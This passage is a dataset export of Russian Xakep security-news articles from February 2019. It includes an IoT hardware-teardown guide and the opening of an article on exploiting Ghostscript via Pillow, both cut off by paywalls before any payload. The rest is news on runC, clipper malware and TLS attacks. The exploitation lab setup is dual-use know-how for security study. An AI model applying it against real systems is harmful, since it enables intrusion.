  <content>Где гарантия, что, подключившись к домашнему Wi-Fi, приставка втихаря не собирает пароли от наших любимых сайтов, а умный дом не транслирует с помощью камер видеонаблюдения стрим прямо из спальни? Чтобы обезопасить себя от подобного восстания машин, нужно тщательно изучить принцип работы гаджета и защитить его от проникновения любознательных доброжелателей. И тут внезапно обнаруживается, что ни на одном русскоязычном ресурсе нет методологии анализа защищенности умных вещей. Что ж, самое время это исправить! В 2018 году много обсуждалась безопасность интернета вещей, в том числе в связи с эпидемиями малвари вроде Mirai и VPNFilter, которая заражает домашние гаджеты. Чтобы защититься от подобных неприятностей, нужно хорошо представлять себе устройство и принципы работы умных гаджетов. А значит, мы должны уметь грамотно тестировать такие девайсы. «Хакер» неоднократно писал об уязвимостях умных гаджетов: Тестирование интернета вещей можно разделить на четыре этапа: В этой статье мы поговорим о проблемах безопасности аппаратного уровня, а именно узнаем, как разобрать девайс, чтобы исследовать интерфейсы отладки. Объединим все это в общую задачу: получение прошивки устройства или доступа к консоли управления. Если ты новичок в этой области, статья предложит тебе подробный алгоритм действий, который позволит успешно справиться с подобной задачей. Почему так важна возможность изучить плату устройства? Существуют три типа анализа защищенности. Тестирование «черным ящиком» — когда у нас нет вообще никакой информации о тестируемой системе. Тестирование «серым ящиком» — тот случай, если известны только некоторые особенности реализации тестируемой системы. Тестирование «белым ящиком» — когда нам известны все подробности о тестируемой системе. То есть чем «светлее» «ящик», тем качественнее будет анализ защищенности. Значит, во время тестирования требуется постараться собрать как можно больше данных для перехода от одного типа тестирования к следующему. Разберем на примере «обеление» тестирования. Когда мы впервые берем в руки устройство, мы ничего о нем не знаем. Это означает, что тестирование будет проводиться по методу «черного ящика». Предположим, мы разобрали гаджет и смогли извлечь лог отладки запуска устройства через отладочные порты. Тестирование автоматически становится легче и переходит на уровень «серого ящика». А потом оказывается, что в логах отладки засветился пароль администратора, используя который мы смогли подключиться к консоли управления устройством и получили возможность считывать и записывать любой файл в файловой системе. На этом этапе тестирование перешло на последний уровень «белого ящика». Скорее всего, многие читатели решат пропустить эту часть статьи. Именно так я бы и поступил несколько месяцев назад, но оказалось, что в этой теме есть множество нюансов, знание которых может заметно облегчить жизнь начинающему исследователю. Чтобы максимально усложнить задачу любителям покопаться в потрохах электронных устройств, их производители напридумывали огромное количество специальных винтов самой причудливой формы. И не зря: в случае чего придется вскрывать устройство другими методами, в результате мы можем повредить плату и добровольно избавить разработчика гаджета от грустной обязанности выполнять гарантийные обязательства. На иллюстрации ниже показан классический пример нераскручиваемого винта. А вот так выглядит концепт «безопасного» винта Apple. Чтобы быть максимально готовым к подобным сюрпризам, тебе нужно заранее закупиться набором отверток с необходимыми переходниками. Не буду рекламировать решения конкретных производителей (тем более, они не платят за это денег редакции «Хакера»), но наборы, специально предназначенные для разборки мобильных устройств, в среднем стоят около шестидесяти баксов. Однако даже самый крутой набор отверток не гарантирует стопроцентного успеха. На практике мне попадались устройства с нормальными винтами, при откручивании которых внутри корпуса ломалась пластмассовая часть с внутренней винтовой резьбой. Поэтому очень важно обращаться с хрупкими девайсами аккуратно, используя отвертки руками, растущими строго из нужного места. О разных шлицах винтов и их происхождении ты можешь прочитать в статье «Тайная жизнь винтов: от имбуса до минус потая». Думаю, ты наверняка в детстве из любопытства разбирал электронику и изучал платы разных устройств. Очень часто на ней обнаруживалась странная черная «клякса» — примерно такая, как на картинке ниже. Она называется «компаунд». Если сказать проще, это отвердевшая полимерная смола с некоторыми добавками. Используется она преимущественно как электроизоляционный материал и иногда может мешать подключиться к определенным контактам на плате. Примем за основу компаунда эпоксидную смолу, как самый популярный тип. Если ты поищешь по форумам советы о том, чем ее убрать, то найдешь много разных способов для самых различных случаев. Бессмысленно перечислять их все, подскажу только самый проверенный: нагревать верхние слои смолы и удалять. Это, конечно, не так красиво, как растворение, но зато почти всегда работает! Также стоит упомянуть, что на китайских платах иногда может встретиться прозрачный клей. Он легко удаляется, поэтому не будем на нем останавливаться. На практике другие методы защиты от вскрытия встречаются крайне редко. В специализированной литературе мне попадались упоминания о наличии специальных клипс, после вскрытия которых устройство уже будет нецелесообразно изучать. Так вот, это настолько диковинный способ защиты, что я даже не могу предложить пример такого устройства. Если тебе попадалось что-то подобное, обязательно поделись своим опытом в комментариях. После вскрытия устройства нас будет интересовать только его электронная плата. Материалы из последних выпусков можно покупать отдельно только через два месяца после публикации. Чтобы продолжить чтение, необходимо купить подписку. Подписка позволит тебе в течение указанного срока читать ВСЕ платные материалы сайта. Мы принимаем оплату банковскими картами, электронными деньгами и переводами со счетов мобильных операторов. Подробнее о подписке 7190 р. 720 р.</content>
  <url>https://xakep.ru/2019/02/12/gadgets-howto/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>d3dac5ef-aa86-477f-9bf8-3fd58c6e0ae6</id>
  <title>Уязвимость в runC угрожает безопасности Docker, Kubernetes и не только</title>
  <keywords>Docker;Kubernetes;runC;Контейнеры;Новости;Уязвимости</keywords>
  <content>О серьезной уязвимости в инструменте для запуска контейнеров runC (CVE-2019-5736), сообщает инженер SUSE Алекса Сараи (Aleksa Sarai). Проблему, которая также может касаться LXC и Apache Mesos, обнаружили исследовали Адам Иванюк (Adam Iwaniuk) и Борис Поплавский (Borys Popławski). Напомню, что runC является дефолтным инструментом для запуска контейнеров Docker, containerd, Podman, CRI-O, и проект поддерживают такие гиганты, как Facebook, Google, Microsoft, Oracle и другие. Сообщается, что обнаруженный баг позволяет вредоносному контейнеру перезаписать исполняемый файл runc на хост-системе, при этом взаимодействие с пользователем требуется минимальное. Таким образом атакующий сможет получить root-доступ к хосту и возможность исполнять произвольный код. В сущности, атака связана с запуском исполняемого файла runc в окружении контейнера, однако его обработка уже произойдет в окружении хоста. Для реализации атаки злоумышленник должен будет либо вынудить жертву создать контейнер из заранее подготовленного вредоносного образа, либо подключиться (docker exec) к уже существующему контейнеру, к которому у злоумышленника был доступ на запись. Эксперты отмечают, что это не так уж и сложно, ведь администраторы часто используют первый попавшийся контейнер, не проверяя, что внутри. Подчеркивается, что CVE-2019-5736 не представляет угрозы для систем, где user namespaces используется корректно, но угрожает системам с дефолтными настройками AppArmor и SELinux. Специалист RedHat Скотт Маккарти (Scott McCarty) предупреждает, что обнаруженная уязвимость может спровоцировать настоящий судный день в корпоративном ИТ, ведь через эксплуатацию этого бага потенциальные атакующие могут «достать» и другие связанные с хост-системой решения, то есть может произойти целая цепочка взломов. Proof-of-concept эксплоит планируют опубликовать 18 февраля 2019 года, и администраторов призывают срочно озаботиться установкой патчей. В настоящее время свои продукты уже обновили разработчики Amazon, Google, Docker, RHEL, Fedora и Ubuntu; идет работа над исправлениями для Debian и SUSE; представители Red Hat пишут, что Red Hat Enterprise Linux и Red Hat OpenShift по умолчанию защищены, и дают советы по обходу проблемы. Фото: Depositphotos</content>
  <url>https://xakep.ru/2019/02/12/runc-flaw/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>28a3226f-44c3-4052-a07b-908a523f181b</id>
  <title>В Google Play нашли малварь, подменяющую данные в буфере обмена</title>
  <keywords>Android;Blockchain;Google Play;Metamask;Клиппер;Криптовалюта;Новости;Приложения</keywords>
  <content>Специалист ESET Лукас Стефанко (Lukas Stefanko) обнаружил в официальном каталоге приложений Google приложение-клиппер, то есть малварь, подменяющую данные в буфере обмена (от термина clipboard, «буфер обмена»). Стефанко напоминает, что клипперы сами по себе явление не новое, и подобная малварь давно атакует пользователей Windows. В последние годы злоумышленники также не оставляют без внимания и пользователей Android. К примеру, летом прошлого года аналитики «Доктор Веб» предупреждали о трояне Android.Clipper, способном подменять в буфере обмена номера кошельков самых разных платежных систем и криптовалют. Однако до настоящего времени клипперы для Android распространялись через сторонние магазины приложений, взломанные сайты и другие подобные ресурсы, а теперь эксперт ESET обнаружил малварь именно в Google Play. Стефанко нашел в официальном каталоге сразу несколько приложений, маскировавшихся под популярное приложение криптовалютных кошельков MetaMask. Антивирусные продукты ESET детектируют подделку как Android/Clipper.C. Основной целью операторов малвари была кража учетных данных и приватных ключей, необходимых для получения доступа к кошелькам пользователей. Помимо этого приложение работало и как клиппер: заменяло любые адреса Bitcoin- и Ethereum-кошельков пользователей на адреса атакующих. К сожалению, специалисты ESET не сообщают ничего о количестве пострадавших, а также о том, сколько удалось «заработать» операторам этой подделки. Известно лишь, что в настоящее время малварь уже была удалена из Google Play. &lt;span data-mce-type="bookmark" style="display: inline-block; width: 0px; overflow: hidden; line-height: 0;" class="mce_SELRES_start"&gt;﻿&lt;/span&gt; Напомню, что это не первый случай, когда популярностью MetaMask пользуются мошенники. К примеру, в ноябре 2018 года эксперты ESET уже находили в Google Play подделки, замаскированные под легитимные криптовалютные сервисы, предназначавшиеся для кражи учетных данных пользователей. Среди них и тогда было приложение MetaMask.</content>
  <url>https://xakep.ru/2019/02/12/clipper-on-google-play/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>203cddef-ff5d-46d4-b155-329fea0cf0f8</id>
  <title>Microsoft призывает отказаться от использования Internet Explorer</title>
  <keywords>Internet Explorer;Microsoft;Браузеры;Новости</keywords>
  <content>В конце прошлой недели главный архитектор кибербезопасности в Microsoft Крис Джексон (Chris Jackson) опубликовал в блоге компании интересный пост, озаглавленный «Риски использования Internet Explorer в качестве браузера по умолчанию». Хотя Windows 10 оснащена более новым, быстрым и надежным браузером Edge, который является браузером по умолчанию, ОС все равно поставляется с Internet Explorer 11 в комплекте. Проблема в том, что корпоративные клиенты с legacy-системами часто идут по пути наименьшего сопротивления и пытаются использовать IE как браузер по умолчанию, а это, по словам Джексона, неправильно и опасно. Эксперт объясняет, что в сущности Internet Explorer – это не браузер в современном понимании этого слова, а решение, существующее в угоду совместимости, а также для работы с legacy-контентом. То есть использовать его постоянно нет нужды, особенно учитывая, что IE не поддерживает новые веб-стандарты, а разработчики давно не проверяют свои продукты на совместимость с IE. Интересно, что при этом Джексон не агитирует пользователей переходить конкретно на Edge, а также не упоминает Chrome или Firefox. Специалист пишет, что не хочет навязывать людям какой-либо конкретный продукт и напоминает, что Windows позволяет использовать любой современный браузер, подходящий конкретно для ваших задач. Фото: Wired</content>
  <url>https://xakep.ru/2019/02/11/no-more-ie-2/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>ffb85fd8-eb77-438d-a5eb-6b0f77831204</id>
  <title>В марте в Москве пройдет вторая конференция «Код ИБ ПРОФИ»</title>
  <keywords>Анонс;Код ИБ ПРОФИ;Конференции;Новости</keywords>
  <content>Опираясь на опыт прошлого мероприятия, организаторы внесли ряд изменений в программу и содержание конференции. В частности, четыре образовательных потока сократятся до двух, что позволит участникам меньше распыляться и сконцентрировать свое внимание на действительно важных вещах. Более жесткая модерация докладов, которую осуществляет куратор конференции, отсечет рекламу и оставит только полезный прикладной контент. «Второй московский и уже четвертый “Код ИБ ПРОФИ” мы решили посвятить чек-листам в области управления кибербезопасностью. Участники не только услышат ведущих российских экспертов и харизматичных спикеров, которые смогут интересно рассказать о животрепещущих вопросах, встречающихся в деятельности каждого специалиста по ИБ, но и получат набор чек-листов в завершении каждого выступления, которые позволят быстро начать применять на практике полученные в ходе “Код ИБ. ПРОФИ” знания», — комментирует новую концепцию «Кода ИБ ПРОФИ» Алексей Лукацкий. Среди спикеров мероприятия заявлены Рустем Хайретдинов (Атак Киллер), Дмитрий Мананников, Лев Палей (СО ЕЭС), Илья Борисов (ThyssenKrupp), Алексей Плешков (Газпромбанк), Денис Горчаков (Ростелеком), Александр Леонов (Тинькофф). Полный перечень экспертов представлен на сайте конференции. Темы выступлений будут максимально практическими и построены в концепте know-how, то есть начинаться с вопроса КАК: повысить осведомленность пользователей, защитить бизнес-процесс, извлекать пользу из DARKNET, подготовиться к CSIRT, выстроить процесс управления уязвимостями и т.д., а заканчиваться конкретным набором рекомендаций, относящихся к заявленной теме. Традиционный формат «2 дня учебы + 2 дня приключений» будет сохранен. Какие именно приключения ожидают участников, организаторы пока держат в секрете, но сообщают, что их тематика будет военно-исторической. «Для участников наш “Код ИБ ПРОФИ” – это не только возможность прокачать свои знания и практические навыки, но и завести полезные знакомства в кругу профессионалов информационной безопасности. На своих мероприятиях мы создаем теплую дружескую атмосферу, которая располагает к общению и обмену опытом», — рассказывает продюсер события Ольга Поздняк. Подать заявку на участие и ознакомиться с программой конференции можно по ссылке.</content>
  <url>https://xakep.ru/2019/02/11/profi-moscow/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>af710a55-69a6-44d0-9561-2e1505257e6e</id>
  <title>Злая картинка. Разбираем уязвимость в GhostScript, чтобы эксплуатировать Pillow и ImageMagick</title>
  <keywords>Ghostscript;Linux;Pillow;Взлом;Выбор редактора;Статьи;Уязвимости</keywords>
  <content>Python Imaging Library (PIL) и ее современный форк Pillow предназначены для работы с изображениями из Python. В общих чертах они напоминают модуль gd в PHP. Эти библиотеки используются во многих популярных фреймворках и модулях. Их вызовы можно встретить в самых разных примерах кода. В общем, Pillow нередко встречается в продакшене, если один из компонентов стека — это язык Python. Для операций с файлами PIL и Pillow используют внешние утилиты, такие как Ghostscript. Ghostscript — это кросс-платформенный интерпретатор языка PostScript (PS). Он может обрабатывать файлы PostScript и конвертировать их в другие графические форматы, выводить содержимое и печатать на принтерах, не имеющих встроенной поддержки PostScript. А PostScript, в свою очередь, — это не просто язык разметки, а полноценный язык программирования. В нем реализованы свои алгоритмы работы с текстом и изображениями. Официальная документация Adobe на PostScript в данный момент насчитывает около 900 страниц текста и примеров. Так что развернуться тут есть где. Неудивительно, что настолько развесистая штуковина иногда позволяет проделывать вещи, которые не были предусмотрены разработчиками интерпретаторов. На этот раз в интерпретаторе Ghostscript и была обнаружена пачка уязвимостей, которые снова нашел Тавис Орманди (Tavis Ormandy) из Google Project Zero. Он сообщил о своей находке осенью этого года. Найденные уязвимости — это, по сути, продолжение прошлогодней ошибки в Ghostscript, что получила название GhostButt. Давай выясним, какие слабые места были обнаружены и каким образом их можно проэксплуатировать. Демонстрировать уязвимость я, как обычно, буду с помощью Docker и контейнера на основе Debian. Если хочешь немного подебажить, то запускай контейнер с соответствующими ключами. Обновляем репозитории и устанавливаем Python, менеджер пакетов pip и вспомогательные утилиты. Теперь установим последнюю уязвимую версию Pillow. Для удобства тестирования нам также понадобится Flask. Это популярный фреймворк для создания веб-приложений. Теперь с его помощью напишем небольшой скриптик, который будет принимать пользовательские картинки и менять их размер. Довольно обычное поведение для современных веб-сервисов. Осталось запустить этот скрипт и посмотреть на результат его работы в браузере. Если не хочешь возиться со всеми предустановками вручную, то можешь воспользоваться готовым решением из репозитория Vulhub. Также нам нужен собственно сам Ghostscript версии ниже 9.24. Я буду использовать две версии: 9.21 — для демонстрации уязвимости GhostButt и 9.23 — для тестирования текущего бага. Взять их можно на официальном сайте в разделе загрузок. После распаковки в соответствующих папках ты найдешь бинарники gs-921-linux-x86_64 и gs-923-linux-x86_64. Я буду перемещать их в /usr/bin/gs по мере необходимости. Еще я поставил вспомогательную утилиту для отладчика GDB — pwndbg. И скачал исходники Ghostscript, чтобы скомпилировать дебаг-версии утилиты. Готовые дебаг-бинарники будут лежать в папке debugbin. Вот теперь стенд готов. Прежде чем переходить к рассмотрению недавних уязвимостей, вернемся на год назад и посмотрим на их прародителя. Проблемные версии — 9.21 и ниже, поэтому берем 9.21. Первым делом стоит обратить внимание на то, что PIL автоматически определяет тип передаваемого файла. По аналогии с ImageMagick библиотека смотрит на заголовок картинки и передает управление нужному участку кода. При обработке файла отрабатывает функция _open_core. Она вызывает метод _accept из каждого класса, который отвечает за формат файла. В качестве аргументов передаются первые 16 байт обрабатываемого файла. Материалы из последних выпусков можно покупать отдельно только через два месяца после публикации. Чтобы продолжить чтение, необходимо купить подписку. Подписка позволит тебе в течение указанного срока читать ВСЕ платные материалы сайта. Мы принимаем оплату банковскими картами, электронными деньгами и переводами со счетов мобильных операторов. Подробнее о подписке 7190 р. 720 р.</content>
  <url>https://xakep.ru/2019/02/11/ghostbutt/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>f6e912f2-44f5-42df-b204-3552491c6231</id>
  <title>В браузере Opera для Android появится встроенный VPN</title>
  <keywords>Android;Opera;VPN;Браузеры;Мобильные устройства;Новости</keywords>
  <content>В апреле 2018 года разработчики Opera сообщили о внезапном закрытии Opera VPN. Тогда разработчики не объяснили, чем было вызвано данное решение, а пользователям в качестве замены предложили скидки или бесплатные версии продуктов SurfEasy VPN. Теперь, спустя почти год после этих событий, разработчики Opera анонсировали, что совсем скоро в браузере для Android появится встроенный VPN, то есть пользователям более не придется загружать и устанавливать отдельное приложение. Пока новый модуль работает в режиме бета-тестирования. Встроенный в браузер VPN обещает быть полностью бесплатным, безлимитным и не хранить никакие логи и данные клиентов. Включить VPN можно в настройках Opera, и при этом пользователям предложат выбрать желаемый виртуальный регион (Европа, Америка, Азия или «Оптимальное местоположение»). Также можно настроить область применения VPN, например, включать VPN только для приватных вкладок, но не использовать при работе с поисковиками, для получения более релевантных результатов. Бета-версия приложения уже доступна всем желающим в официальном каталоге Google Play. Пока разработчики не сообщают, планируется ли появление VPN и в Opera для iOS.</content>
  <url>https://xakep.ru/2019/02/11/opera-android-vpn/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>f99e264c-7fe5-4171-8f31-593d9c5424ff</id>
  <title>Новая атака представляет угрозу даже для TLS 1.3</title>
  <keywords>QUIC;TLS;TLS 1.3;Атака Блейхенбахера;Криптография;Новости;Уязвимости;шифрование</keywords>
  <content>Сводная группа специалистов из Тель-Авивского университета, Университета Аделаиды, Университета Мичигана, Института Вейцмана, а также NCC Group и Data61 представила доклад (PDF), посвященный новым вариациям атаки Блейхенбахера, представляющим угрозу даже для новейшего TLS 1.3. Чтобы понимать суть проблемы, нужно вспомнить, что из себя представляет атака Блейхенбахера. В далеком 1998 году специалист Bell Laboratories Даниэль Блейхенбахер (Daniel Bleichenbacher) обнаружил проблему (PDF), связанную с тем, как ведет себя TLS-сервер, в том случае, если его оператор решил зашифровать обмен ключами между клиентом и сервером при помощи алгоритма RSA. Суть атаки, разработанной тогда Блейхенбахером, заключалась в том, что перед установкой зашифрованного соединения, клиент случайным образом выбирает ключ сессии, который затем зашифровывается публичным ключом и отправляется серверу. Сервер расшифровывает это «послание», сохраняет копию ключа сессии и впоследствии использует для идентификации клиента. Таким образом клиент проходит валидацию, и устанавливается защищенное HTTPS-соединение. Так как алгоритм RSA недостаточно защищен сам по себе, дополнительно используется так называемый padding, то есть добавление ничего не значащих данных к зашифровываемой информации, что в итоге должно повысить стойкость шифрования. Блейхенбахер обнаружил проблему в случае если ключи сессий, шифрующиеся с помощью RSA, используют padding PKCS #1 1.5. Оказалось, что атакующий может просто направлять TLS-серверу случайные ключи, спрашивая, верны ли они. Подобрать настоящий ключ можно основываясь лишь на ответах сервера: простом «да/нет», которое тот возвращает в ответ на запрос «это RSA-ключ сессии?». Однако после обнаружения данного бага от использования алгоритма RSA не отказались. Вместо этого авторы стандарта TLS реализовали ряд контрмер, которые мешали осуществить подобный брутфорс. К сожалению, этого оказалось явно недостаточно, и ИБ-специалисты уже неоднократно находили другие способы реализации атаки Блейхенбахера. Соответствующие исследования были представлены в 2003, 2012, 2014 и 2015 годах. Среди наиболее свежих вариаций этой проблемы можно вспомнить атаки, получившие названия DROWN (Decrypting RSA with Obsolete and Weakened eNcryption) и ROBOT (Return Of Bleichenbacher’s Oracle Threat), 2016-2017 годов. Теперь группа вышеупомянутых специалистов в очередной раз нашла новые способы обхода RSA PKCS#1 v1.5. Хуже того, предложенные исследователями атаки в определенных ситуациях затрагивают не только TLS, но и протокол шифрования QUIC, разработанный Google. Исследователи пишут, что их решение – это атака по стороннему каналу, которая использует данные «утекающие» через процессорный кеш и позволяет скомпрометировать обмен ключами RSA и определенные имплементации TLS. Хотя в новейшей версии TLS (1.3) использование RSA сводится к минимуму, специалисты обнаружили, что в ряде случаев возможно понизить соединение до TLS 1.2, после чего можно применять атаку Блейхенбахера. Изучив различные имплементации TLS, специалисты пришли к выводу, что перед новыми вариациями старой проблемы уязвимы OpenSSL, Amazon s2n, MbedTLS, Apple CoreTLS, Mozilla NSS, WolfSSL и GnuTLS. В настоящее время все библиотеки уже получили обновления, так как исследователи предупредили разработчиков о своих выводах еще осенью прошлого года. Также в докладе отмечается, что BearSSL и Google BoringSSL проблема не затрагивала. Обнаруженным экспертами уязвимостям были присвоены следующие идентификаторы: CVE-2018-12404, CVE-2018-19608, CVE-2018-16868, CVE-2018-16869 и CVE-2018-16870.</content>
  <url>https://xakep.ru/2019/02/11/new-bleichenbacher-attacks/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

</articles>
